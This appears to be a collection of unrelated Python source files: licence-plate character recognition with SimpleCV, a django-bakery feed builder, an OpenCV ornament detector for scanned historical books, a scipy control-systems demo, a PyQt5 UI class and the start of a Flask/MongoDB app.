target_img.dl().text(str(blob.x) + "," + str(blob.y), (x1, y1 - 15), text_color)
return target_img
def _regroupListOfList(inp_list_of_list, sort_function, compare_function, COMPARATOR_PARAMETER):
final_list_of_list = []
for this_list in inp_list_of_list:
temp_list_of_list = _groupBlobListWithCategory(this_list, sort_function, compare_function, COMPARATOR_PARAMETER)
final_list_of_list.extend(temp_list_of_list)
return final_list_of_list
def _groupBlobListWithCategory(inp_blob_list, sort_function, compare_function, COMPARATOR_PARAMETER):
#Sort according to desired category
inp_blob_list = sort_function(inp_blob_list)
list_of_blob_lists = []
this_feature_set = SimpleCV.FeatureSet()
    #Seed the first group with the first blob; the loop below starts at index 1
this_feature_set.append(inp_blob_list[0])
#Segregate blob list according to specified condition in compareFunction
for blob_index in range(1, len(inp_blob_list)):
prev_blob = inp_blob_list[blob_index - 1]
current_blob = inp_blob_list[blob_index]
#If yes, put it on the same list
if (compare_function(current_blob, prev_blob, COMPARATOR_PARAMETER)):
this_feature_set.append(current_blob)
#if no, put it on a new list
else:
list_of_blob_lists.append(this_feature_set)
this_feature_set = SimpleCV.FeatureSet()
this_feature_set.append(current_blob)
#Last thisFeatureSet won't be appended. So append it ;)
list_of_blob_lists.append(this_feature_set)
return list_of_blob_lists
def _sortByY(this_list):
return sorted(this_list, key = lambda blob: blob.y)
def _yRelativeGapComparator(this_current_blob, this_prev_blob, MAX_Y_GAP):
if ((this_current_blob.y - this_prev_blob.y) <= MAX_Y_GAP):
return True
else:
return False
def _sortByWidth(this_list):
sorted_list = sorted(this_list, key = lambda blob: blob.width())
return sorted_list
def _widthRelativeGapComparator(this_current_blob, this_prev_blob, MAX_WIDTH_GAP):
if ((this_current_blob.width() - this_prev_blob.width()) <= MAX_WIDTH_GAP):
return True
else:
return False
def _sortByHeight(this_list):
sorted_list = sorted(this_list, key = lambda blob: blob.height())
return sorted_list
def _heightRelativeGapComparator(this_current_blob, this_prev_blob, MAX_HEIGHT_GAP):
if ((this_current_blob.height() - this_prev_blob.height()) <= MAX_HEIGHT_GAP):
return True
else:
return False
def _sortByAspectRatio(this_list):
sorted_list = sorted(this_list, key = lambda blob: float(blob.width()) / blob.height())
return sorted_list
def _aspectRatioRelativeGapComparator(this_current_blob, this_prev_blob, MAX_AR_GAP):
current_blob_AR = float(this_current_blob.width()) / this_current_blob.height()
prev_blob_AR = float(this_prev_blob.width()) / this_prev_blob.height()
if ((current_blob_AR - prev_blob_AR) <= MAX_AR_GAP):
return True
else:
return False
def _filterAlphanumericBlobs(inp_list_of_lists, MIN_COUNT, MAX_COUNT, MAX_WIDTH_MULTIPLE):
out_list_of_lists = []
for this_list in inp_list_of_lists:
if (MIN_COUNT <= len(this_list) <= MAX_COUNT):
this_list = this_list.sortX()
#Get edges and average width
first_blob_left_edge = this_list[0].minX()
last_blob_right_edge = this_list[-1].maxX()
sum_width = float(0)
for this_blob in this_list:
sum_width += this_blob.width()
ave_width = sum_width / len(this_list)
if ((last_blob_right_edge - first_blob_left_edge) <= (ave_width * MAX_WIDTH_MULTIPLE)):
out_list_of_lists.append(this_list)
return out_list_of_lists
def _clip(val, min_val, max_val):
if val < min_val:
val = min_val
elif val > max_val:
val = max_val
return val
def _monkeyPatchBlobs(input_blobs, input_image, MIN_AREA_FILLED=45):
out_blobs = SimpleCV.FeatureSet()
for blob in input_blobs:
new_blob = _overrideBlob(blob, input_image, MIN_AREA_FILLED)
out_blobs.append(new_blob)
return out_blobs
def _overrideBlob(input_blob, input_image, MIN_AREA_FILLED, DESIRED_AR=0.59):
x_boundL, x_boundU = 0, input_image.width-1
orig_x, orig_y = input_blob.x, input_blob.y
orig_width = input_blob.width()
orig_height = input_blob.height()
#Check first if blob's shape is rectangular
perc_filled = (float(input_blob.area()) / (orig_width * orig_height)) * 100
if perc_filled < MIN_AREA_FILLED:
return input_blob
print colored("Special Blob : (%i, %i) : %f filled" %(orig_x, orig_y, perc_filled),
color='yellow', on_color='on_blue', attrs=['bold'])
#if not input_blob.isRectangle(0.08):
# return input_blob
new_width = int(DESIRED_AR * orig_height)
new_minX = _clip(orig_x - (new_width / 2), x_boundL, x_boundU)
new_maxX = _clip(orig_x + (new_width / 2), x_boundL, x_boundU)
new_blobMask = input_image[int(new_minX):int(new_maxX), orig_y:orig_y+orig_height]
#Define new method and attribute for width
blob = copy.copy(input_blob)
blob.width = lambda : new_width
blob.minX = lambda : new_minX
blob.maxX = lambda : new_maxX
blob.blobImage = lambda : new_blobMask
blob.blobMask = lambda : new_blobMask
return blob
#-------------------------------------------------------------------------------------------
import charRecog
import os
prog_path = os.path.dirname(os.path.realpath(__file__))
blacklist_path = prog_path + "/template/blacklist/"
blacklist_reader = charRecog.CharReader(blacklist_path)
blacklist2_path = prog_path + "/template/blacklist2/"
blacklist2_reader = charRecog.CharReader(blacklist2_path)
def _removeBlacklistCharacters(input_blobs, input_image, charReader, threshold, debug=False):
retained_list = []
removed_list = []
for blob in input_blobs[0]:
x1, y1 = blob.minX(), blob.minY()
x2, y2 = blob.maxX(), blob.maxY()
otsu_char = input_image[x1:x2, y1:y2]
reading = charReader.findMatch(otsu_char, threshold, perform_unit_test=debug)
if reading == '?':
retained_list.append(blob)
else:
removed_list.append(blob)
num_removed = (len(input_blobs[0]) - len(retained_list))
if num_removed > 0:
print colored("Blacklisted: %i" %num_removed,
on_color='on_green', attrs=['bold'])
if len(retained_list):
return [retained_list], [removed_list]
else:
return [retained_list], []
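# Minimal driver sketch (Python 2 / SimpleCV, matching this module; the
# image path is hypothetical):
#   img = SimpleCV.Image("plate.jpg").binarize()
#   groups = findChar(img)
#   if groups is not None:
#       for blob in sorted(groups[0], key=lambda b: b.x):
#           print blob.x, blob.y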
```
#### File: spear/LPR/charRecog.py
```python
import SimpleCV
import cv2
import os
import time
import matplotlib.pyplot
class CharReader:
def __init__(self, inp_image_path):
char_template_list = []
img_filename_list = os.listdir(inp_image_path)
#Load all images and make CharTemplate objects
for img_filename in img_filename_list:
char_image = SimpleCV.Image(inp_image_path + img_filename)
char_value = img_filename.split(".")[0].split("_")[0]
this_char_template = CharTemplate(char_image, char_value)
char_template_list.append(this_char_template)
#Sort by value
char_template_list.sort(key = lambda (this_template): this_template.value)
#Store all CharTemplate objects
self.templates = char_template_list
def findMatch(self, inp_test_image, threshold=0, perform_unit_test=False):
#Contains list of (char, percent) tuples.
result_list = []
for this_template in self.templates:
template_image = this_template.image
current_char = this_template.value
perc_match = compareImage(inp_test_image, template_image)
result_list.append((current_char, perc_match))
#----------------------------------------------------------------
if perform_unit_test:
display = SimpleCV.Display((640, 480), title="SPEAR")
print "Char:" + current_char + " [" + str(perc_match) + " %]"
while not display.isDone():
w, h = inp_test_image.width, inp_test_image.height
inp_test_image.sideBySide(template_image.resize(w, h).invert()).save(display)
if display.mouseLeft:
display.done = True
time.sleep(0.2)
display.done = False
#---------------------------------------------------------------
#Sort result_list by highest percentage
result_list = sorted(result_list,
key=lambda(this_tuple): this_tuple[1],
reverse=True)
#---------------------------------------------------------
if perform_unit_test:
match_plot = matplotlib.pyplot
char_list, perc_list = [], []
for pair in result_list:
char_list.append(pair[0])
perc_list.append(pair[1])
match_plot.xticks(range(0, len(char_list)), char_list)
match_plot.stem(perc_list)
match_plot.show()
#---------------------------------------------------------
#If highest match is 0% then put a '?' Char instead
if result_list[0][1] > float(threshold):
best_match = result_list[0][0]
else:
best_match = '?'
return best_match
class CharTemplate:
def __init__(self, template_img, template_value):
self.image = template_img
self.value = template_value
def compareImage(test_image, template_image, compMeth=cv2.TM_SQDIFF_NORMED):
"""
Method:
Compares an image against a template and returns matching percentage.
Parameters:
test_image - A SimpleCV.Image to be used.
template_image - A SimpleCV.Image for the template.
compMeth = CV2 comparison method.
Returns:
Similarity percentage of two images.
"""
#Resize template to fit test image
template_image_cv2 = template_image.invert().resize(test_image.width, test_image.height).getGrayNumpyCv2()
test_image_cv2 = test_image.getGrayNumpyCv2()
match_result = cv2.matchTemplate(test_image_cv2, template_image_cv2, compMeth)
match_percent = 100 - (100 * match_result[0][0])
return match_percent
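# Usage sketch (the template directory and input image are hypothetical):
#   reader = CharReader("template/alphanumeric/")
#   best = reader.findMatch(char_image, threshold=40)
#   print "Best match:", best  # '?' when no template clears the threshold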
```
#### File: spear/LPR/maskCreate.py
```python
import sklearn.cluster
def colorSegmentation(input_image, NUM_CLUSTERS=7, RANGE_OFFSET=30, SCALE_FACTOR=0.1,
use_fast_KMeans=False, perform_unit_test=False,
right_click_save=False):
"""
Method:
Takes a SimpleCV.Image, computes the most dominant colors
using K-Means clustering, and returns a list of SimpleCV.Image
binary masks using the dominant color.
Parameters:
input_image - Input image to be used.
        NUM_CLUSTERS - Number of Clusters (k) for K-Means algorithm.
RANGE_OFFSET - Minimum and maximum deviation from the RGB center.
SCALE_FACTOR - Applies scaling to reduce processing delay at cost of accuracy loss.
use_fast_KMeans - Use Mini Batch KMeans for faster processing at cost of accuracy loss.
perform_unit_test - Used for debugging.
right_click_save - Right click saves image in Unit Test mode.
Returns:
List of SimpleCV.Image with applied binary mask.
"""
#For some reason, scale method doesn't yield expected result with Kmeans :/
scaled_image = input_image.resize(int(input_image.width * SCALE_FACTOR),
int(input_image.height * SCALE_FACTOR))
raw_RGB_list = _toPixelArray(scaled_image)
clustered_RGB_list = _getDominantColors(raw_RGB_list, NUM_CLUSTERS, use_fast_KMeans)
color_mask_list = _makeBinaryMasks(input_image, clustered_RGB_list, RANGE_OFFSET)
if perform_unit_test:
_unitTest(input_image, raw_RGB_list, clustered_RGB_list,
color_mask_list, right_click_save)
return color_mask_list
def thresholdSweep(input_image, MIN_THRESHOLD=0, MAX_THRESHOLD=255,
THRESH_STEP=10, use_rgb_mask=False):
"""
Method:
Creates list of SimpleCV.Image masks using Threshold Sweeping.
Parameters:
input_image - Image to use in generating masks.
MIN_THRESHOLD - Lower boundary of the sweep.
MAX_THRESHOLD - Upper boundary of the sweep.
THRESH_STEP - Incremental value from lower to upper boundary.
use_rgb_mask - Use RGB channels of an image rather than just the grayscale.
Returns:
List of SimpleCV.Image, the Masks generated.
"""
#Returns a Generator!
make_mask = lambda (this_img): _createMaskThresholdSweep(this_img, MIN_THRESHOLD, MAX_THRESHOLD, THRESH_STEP)
if not use_rgb_mask:
return make_mask(input_image)
else:
combined_masks = []
r, g, b = input_image.splitChannels()
        #extend() consumes each generator here, materializing the masks into a list
combined_masks.extend(make_mask(r))
combined_masks.extend(make_mask(g))
combined_masks.extend(make_mask(b))
return combined_masks
def _unitTest(input_image, raw_RGB_list, clustered_RGB_list, color_mask_list, save_on_right_click):
import SimpleCV
import time
display = SimpleCV.Display((input_image.width, input_image.height))
print "Extracted " + str(len(clustered_RGB_list)) + " colors."
for index, this_mask in enumerate(color_mask_list):
print clustered_RGB_list[index]
this_mask.save(display)
while not display.isDone():
if display.mouseLeft:
display.done = True
time.sleep(0.2)
elif display.mouseRight and save_on_right_click:
this_mask.save(str(index) + ".jpg")
print "Image saved."
time.sleep(0.2)
display.done = False
def _toPixelArray(input_image):
RGB_pixel_matrix = input_image.getNumpy()
RGB_pixel_array = RGB_pixel_matrix.reshape(
(RGB_pixel_matrix.shape[0] * RGB_pixel_matrix.shape[1],
3))
return RGB_pixel_array
def _getDominantColors(RGB_array, NUM_CLUSTERS, use_mini_batch):
if use_mini_batch:
cluster_method = sklearn.cluster.MiniBatchKMeans(NUM_CLUSTERS)
else:
cluster_method = sklearn.cluster.KMeans(n_clusters = NUM_CLUSTERS)
cluster_method.fit(RGB_array)
RGB_list = cluster_method.cluster_centers_[:]
return RGB_list
def _makeBinaryMasks(input_image, RGB_color_list, RGB_OFFSET):
mask_list = []
for this_RGB in RGB_color_list:
RGB_min = map(lambda val: _addSub(val, -RGB_OFFSET), this_RGB)
RGB_max = map(lambda val: _addSub(val, RGB_OFFSET), this_RGB)
this_mask = input_image.createBinaryMask(RGB_min, RGB_max)
mask_list.append(this_mask)
return mask_list
def _addSub(inp_val, oper_val):
inp_val += oper_val
if inp_val < 0:
inp_val = 0
elif inp_val > 255:
inp_val = 255
return inp_val
def _createMaskThresholdSweep(inp_image, LOW_BOUND, UPPER_BOUND, INCREMENT):
for thresh in xrange(LOW_BOUND, UPPER_BOUND + 1, INCREMENT):
yield inp_image.threshold(thresh).invert().dilate().erode()
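# Usage sketch (SimpleCV is only imported inside _unitTest above, so the
# caller imports it; the image path is hypothetical):
#   import SimpleCV
#   img = SimpleCV.Image("plate.jpg")
#   color_masks = colorSegmentation(img, NUM_CLUSTERS=5)
#   sweep_masks = thresholdSweep(img)  # a generator of binary masks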
```
|
{
"source": "j-e-d/django-bakery",
"score": 2
}
|
#### File: django-bakery/bakery/feeds.py
```python
import os
import six
import logging
from django.conf import settings
from bakery.views import BuildableMixin
from django.contrib.syndication.views import Feed
logger = logging.getLogger(__name__)
class BuildableFeed(Feed, BuildableMixin):
"""
Extends the base Django Feed class to be buildable.
"""
build_path = 'feed.xml'
def get_content(self, *args, **kwargs):
return self(self.request, *args, **kwargs).content
@property
def build_method(self):
return self.build_queryset
def _get_bakery_dynamic_attr(self, attname, obj, args=None, default=None):
"""
Allows subclasses to provide an attribute (say, 'foo') in three
different ways: As a fixed class-level property or as a method
        foo(self) or foo(self, obj). The second argument 'obj' is
the "subject" of the current Feed invocation. See the Django Feed
documentation for details.
This method was shamelessly stolen from the Feed class and extended
with the ability to pass additional arguments to subclass methods.
"""
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr) or args:
args = args[:] if args else []
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2 + len(args): # one argument is 'self'
args.append(obj)
return attr(*args)
return attr
def get_queryset(self):
return [None]
def build_queryset(self):
for obj in self.get_queryset():
build_path = self._get_bakery_dynamic_attr('build_path', obj)
url = self._get_bakery_dynamic_attr('feed_url', obj)
logger.debug("Building %s" % build_path)
self.request = self._get_bakery_dynamic_attr(
'create_request',
obj,
args=[url or build_path]
)
self.prep_directory(build_path)
path = os.path.join(settings.BUILD_DIR, build_path)
content = self._get_bakery_dynamic_attr('get_content', obj)
self.build_file(path, content)
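# A subclass sketch (the Post model and fields are hypothetical; link and
# items() are standard Django Feed hooks, build_path comes from this class):
#
#   class LatestPostsFeed(BuildableFeed):
#       link = "/posts/"
#       build_path = "posts/feed.xml"
#
#       def items(self):
#           return Post.objects.order_by("-pubdate")[:10]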
```
|
{
"source": "jeddobson/mmlec",
"score": 3
}
|
#### File: mmlec/bin/find_ornamentation_figures.py
```python
import cv2
import imutils
import os, sys, shutil, glob
import numpy as np
import pickle
import nltk
from nltk.corpus import words
from bs4 import BeautifulSoup
import argparse
# set default options
ocrboundaries = False
single_image_switch = False
single_image = None
# parse arguments
parser = argparse.ArgumentParser(
description='locates objects and annotates ECCO TIF documents')
parser.add_argument('object')
parser.add_argument('--draw-ocr-boundaries',help='place green boxes around paragraphs', dest='ocrboundaries', action='store_true')
parser.add_argument('--single-image', help='mark-up just a single page image', dest='single_image', action='store')
args = parser.parse_args()
object = args.object
if args.ocrboundaries == True:
ocrboundaries = True
if args.single_image is not None:
single_image_switch = True
single_image = args.single_image
if object == None:
print("Error: need ECCO object")
exit()
# load English language vocabulary
vocab = words.words()
################################################################################
# pre-load and process all images used for pattern matching
# convert to grayscale on load
################################################################################
manicule_gray = cv2.imread('share/manicule1.jpg',0)
arabesque_gray = cv2.imread('share/arabesque.jpg',0)
rosette_gray = cv2.imread('share/rosette.png',0)
annotation3_gray = cv2.imread('share/annotation3.jpg',0)
longdash_gray = cv2.imread('share/longdash.jpg',0)
# asterisms
asterism_gray = cv2.imread('share/asterism.jpg',0)
inverted_asterism_gray = cv2.imread('share/inverted_asterism.jpg',0)
asterism_block_gray = cv2.imread('share/asterism_block.jpg',0)
asterism_line_gray = cv2.imread('share/asterism_line.jpg',0)
#asterisk_image = cv2.imread('share/asterisk1.jpg')
#asterisk_gray = cv2.cvtColor(asterisk_image, cv2.COLOR_BGR2GRAY)
def find_inverted_asterism(target,output):
(tH, tW) = inverted_asterism_gray.shape[:2]
res = cv2.matchTemplate(target,inverted_asterism_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism(target,output):
(tH, tW) = asterism_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism_line(target,output):
(tH, tW) = asterism_line_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_line_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterism_block(target,output):
(tH, tW) = asterism_block_gray.shape[:2]
res = cv2.matchTemplate(target,asterism_block_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_longdash(target,output):
(tH, tW) = longdash_gray.shape[:2]
res = cv2.matchTemplate(target,longdash_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.75
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_manicule(target,output):
(tH, tW) = manicule_gray.shape[:2]
res = cv2.matchTemplate(target,manicule_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.75
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_arabesque(target,output):
(tH, tW) = arabesque_gray.shape[:2]
res = cv2.matchTemplate(target,arabesque_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.60
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_rosette(target,output):
(tH, tW) = rosette_gray.shape[:2]
res = cv2.matchTemplate(target,rosette_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.65
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
def find_asterisk(target,output):
(tH, tW) = asterisk_gray.shape[:2]
res = cv2.matchTemplate(target,asterisk_gray,cv2.TM_CCOEFF_NORMED)
threshold = 0.70
locations = np.where(res >= threshold)
count=0
for pt in zip(*locations[::-1]):
count = count + 1
cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0,0,255), 2)
return(count)
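# The find_* helpers above all share the same template-matching recipe.
# A generic version is sketched here for reference (it is not wired into
# the calls below, which keep the original per-template functions):
def _find_template(template_gray, target, output, threshold):
    (tH, tW) = template_gray.shape[:2]
    res = cv2.matchTemplate(target, template_gray, cv2.TM_CCOEFF_NORMED)
    count = 0
    for pt in zip(*np.where(res >= threshold)[::-1]):
        count += 1
        cv2.rectangle(output, pt, (pt[0] + tW, pt[1] + tH), (0, 0, 255), 2)
    return count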
def page_reader(volume):
file_name = volume
data = open(file_name,encoding='ISO-8859-1').read()
soup = BeautifulSoup(data, "html.parser")
page_data = soup.findAll('page')
###############################################
# calculate page size
# present method is to find maximum x and y
###############################################
page_size_max = soup.findAll('wd')
max_length = max([int(word.get('pos').split(',')[:2][1]) for word in page_size_max])
max_width = max([int(word.get('pos').split(',')[:2][0]) for word in page_size_max])
page_size = max_length * max_width
# start parsing each page
volume_text = list()
line_starting_position = list()
volume_dataset=list()
volume_dims=list()
for page in page_data:
page_line_starting_position=list()
page_number = page.find('pageid').get_text()
# get page dimensions
word_matrix=list()
t = page.findAll('wd')
for x in t:
word_matrix.append(x.get('pos'))
paragraph_data = page.findAll('p')
paragraph_count = len(paragraph_data)
page_text=list()
page_dims=list()
for paragraph in paragraph_data:
paragraph_matrix=list()
words = paragraph.findAll('wd')
pmin_x1 = min([int(w.get('pos').split(',')[:2][0]) for w in words])
pmin_y1 = min([int(w.get('pos').split(',')[:2][1]) for w in words])
pmax_x2 = max([int(w.get('pos').split(',')[2:][0]) for w in words])
pmax_y2 = max([int(w.get('pos').split(',')[2:][1]) for w in words])
# add x,y of first and last word
#wordloc1 = words[0].get('pos').split(',')[:2]
#wordloc2 = words[(len(words) - 1)].get('pos').split(',')[:2]
#page_dims.append([wordloc1,wordloc2])
page_dims.append([pmin_x1,pmin_y1,pmax_x2,pmax_y2])
structured_list=list()
temp_line=str()
for word in words:
lines=list()
content = word.get_text()
position = word.get('pos').split(',')
paragraph_matrix.append(position)
temp_line=temp_line + ' ' + content.strip()
if int(position[0]) < int(paragraph_matrix[len(paragraph_matrix) - 2][0]):
page_line_starting_position.append(int(position[0]))
lines.append(temp_line)
temp_line=str()
if(len(lines)) > 0:
structured_list.append(lines)
page_text.append(structured_list)
line_starting_position.append(page_line_starting_position)
volume_dims.append(page_dims)
volume_text.append(page_text)
c=list()
for y in page_text:
if len(y) > 0:
for t in y:
c.append(len(str(t[0]).split()))
white_space=0
text_space=0
prior_y = 0
prior_x = 0
for paragraph in page_dims:
text_space = text_space + ( (int(paragraph[2]) - int(paragraph[0])) * (int(paragraph[3]) - int(paragraph[1])))
return(volume_dims,volume_text)
base="../LitAndLang_1/"
volume_dims,volume_text = page_reader(base + object + "/xml/" + object + ".xml")
processed_dir = base + object + "/processed"
image_dir = base + object + "/images/"
# check to see if the directory exists and remove
if os.path.isdir(processed_dir):
shutil.rmtree(processed_dir,ignore_errors=True)
os.mkdir(processed_dir)
found_objects=list()
idx=0
for image_tif in glob.glob(image_dir + '*.TIF'):
# feature to run just on a single image (needs basename)
if single_image_switch == True:
if os.path.basename(image_tif) == single_image:
pass
else:
continue
page_dims = volume_dims[idx]
# need to preserve color information
page_image = cv2.imread(image_tif)
gray_image = cv2.cvtColor(page_image, cv2.COLOR_BGR2GRAY)
gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)
edges = cv2.Canny(gray_image,50,100)
#asterisk_c = find_asterisk(gray_image,page_image)
asterism_c = find_asterism(gray_image,page_image)
inverted_asterism_c = find_inverted_asterism(gray_image,page_image)
manicule_c = find_manicule(gray_image,page_image)
arabesque_c = find_arabesque(gray_image,page_image)
rosette_c = find_rosette(gray_image,page_image)
#longdash_c = find_longdash(gray_image,page_image)
longdash_c = 0
x, y = page_image.shape[:2]
page_area = x * y
mask = np.ones(page_image.shape[:2], dtype="uint8") * 255
pidx=0
for paragraph in page_dims:
word_c = 0
sentences = volume_text[idx][pidx]
if len(sentences) > 0:
for s in sentences:
tokens = nltk.word_tokenize(str(s))
tokens_in_vocab = [word for word in tokens if word.lower() in vocab]
word_c = word_c + len(tokens_in_vocab)
# dump suspect OCR: only mask if we find more than two known words
if word_c > 2:
cv2.rectangle(mask, (paragraph[0], paragraph[1]), (paragraph[2], paragraph[3]), 0, -1)
# draw boundaries around paragraphs if requested
if ocrboundaries == True:
cv2.rectangle(page_image, (paragraph[0], paragraph[1]), (paragraph[2], paragraph[3]), (0,255,0), 2)
pidx = pidx + 1
# smooth page image and mask
edges = cv2.bitwise_and(edges, edges, mask=mask)
kernel = np.ones((5,5),np.uint8)
dilation = cv2.dilate(edges,kernel,iterations = 1)
#output_file = processed_dir + "/d" + os.path.basename(image_tif)
#cv2.imwrite(output_file,dilation)
# search for countours within dilated image
pg_img, contours, hierarchy = cv2.findContours(dilation, cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
image_c = 0
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
# if area of our object is more than 20k pixels
# also remove narrow (bars) or long objects (artifacts)
image_max = 20000
if w * h > image_max and w > (h / 8) and h > (w / 8):
print("found object:",x,y,w,h)
#if w * h > ( page_area * .05) and w > (h / 8):
cv2.rectangle(page_image,(x,y),(x+w,y+h),(255,0,0), 2)
image_c = image_c +1
output_file = processed_dir + "/" + os.path.basename(image_tif)
cv2.imwrite(output_file,page_image)
# store list of found objects
found_objects.append([image_tif,image_c,asterism_c,inverted_asterism_c,manicule_c,
arabesque_c,rosette_c,longdash_c])
idx = idx + 1
output_pickle=open(processed_dir + '/objects_' + object + '.pkl','wb')
pickle.dump(found_objects,output_pickle)
```
|
{
"source": "jedediahfrey/PyLTIGUI",
"score": 3
}
|
#### File: PyLTIGUI/ltigui/systems_intro_v2.py
```python
from __future__ import division
from scipy import *
from pylab import *
from scipy import signal
T=2.0
#T=10.0
fs=100
dt=1.0/fs
t=arange(0.0,T,dt)#create the time vector
u=where(t>0.5,1,0)#create the step input vector
ylim([-0.1,1.1])
#mysys=signal.lti(1,[1,0])
p=4.0*2*pi
mysys=signal.lti(p,[1,p])#this line defines a transfer function
yo=signal.lsim2(mysys,u,t)#this line simulates the output of the system based on input u and time t
u=squeeze(u)
figure(1)
cla()
plot(t,u,t,yo[1])
legend(['input','output'],2)
xlabel('Time (sec)')
ylabel('Amplitude')
title('Step Response')
df=1.0/T#(t.max()-t.min())
f=arange(0,fs,df)
s=2.0j*pi*f
#tf=1.0/s
N=len(f)
def bodeplot(fi,f,tf,clear=True):
figure(fi)
if clear:
clf()
subplot(211)
semilogx(f,20*log10(abs(tf)))
ylabel('Mag. Ratio (dB)')
subplot(212)
semilogx(f,arctan2(imag(tf),real(tf))*180.0/pi)
ylabel('Phase (deg.)')
xlabel('Freq. (Hz)')
#################################
#
# Swept Sine
#
#################################
def Usweep(ti,minf=0.0,maxf=10.0, maxt=max(t)):
if ti<0.0:
return 0.0
else:
curf=(maxf-minf)*ti/maxt+minf
if ti<(maxt*0.95):
return sin(2*pi*curf*ti)
else:
return 0.0
Uchirp=array([Usweep(ti) for ti in t])#this line defines a swept sine input
yc=signal.lsim2(mysys,Uchirp,t)#this line calculates the response to the swept sine input
Uchirp=squeeze(Uchirp)
yco=yc[1]
figure(3)
clf()
subplot(211)
plot(t,Uchirp)
ylabel('input u(t)')
title('Swept Sine Response')
subplot(212)
plot(t,yco)
ylabel('output y(t)')
xlabel('Time (sec)')
ycfft=fft(yco)*2/N
ucfft=fft(Uchirp)*2/N
tfc=ycfft/ucfft
tfcheck=p/(s+p)
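# tfc above is the empirical frequency response (output FFT divided by
# input FFT from the swept-sine test); tfcheck evaluates the analytic
# first-order model H(s) = p/(s + p) at s = j*2*pi*f. The two Bode curves
# plotted next should overlay up to the Nyquist frequency fs/2.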
bodeplot(4,f,tfc)
bodeplot(4,f,tfcheck,clear=False)
fN=f[int(N/2)]
subplot(211)
xlim([0.1,fN])
legend(['experiment','model'],3)
title('Bode Plot')
subplot(212)
xlim([0.1,fN])
ylim([-100,10])
show()
```
|
{
"source": "jedediahfrey/PyQt5Scratch",
"score": 2
}
|
#### File: PyQt5Scratch/mpldesigner/window.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(658, 498)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.mplwindow = QtWidgets.QWidget(self.centralwidget)
self.mplwindow.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mplwindow.sizePolicy().hasHeightForWidth())
self.mplwindow.setSizePolicy(sizePolicy)
self.mplwindow.setMinimumSize(QtCore.QSize(640, 480))
self.mplwindow.setObjectName("mplwindow")
self.mplvl = QtWidgets.QVBoxLayout(self.mplwindow)
self.mplvl.setObjectName("mplvl")
self.mplfigs = QtWidgets.QListWidget(self.mplwindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mplfigs.sizePolicy().hasHeightForWidth())
self.mplfigs.setSizePolicy(sizePolicy)
self.mplfigs.setMaximumSize(QtCore.QSize(200, 16777215))
self.mplfigs.setObjectName("mplfigs")
self.mplvl.addWidget(self.mplfigs)
self.gridLayout.addWidget(self.mplwindow, 0, 0, 2, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
```
|
{
"source": "jedelacarrera/FlaskDB",
"score": 3
}
|
#### File: FlaskDB/flaskr/__init__.py
```python
import os
import sys
import psycopg2
import json
from bson import json_util
from pymongo import MongoClient
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
def create_app():
app = Flask(__name__)
return app
app = create_app()
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "myDatabase"
MONGOSERVER = "localhost"
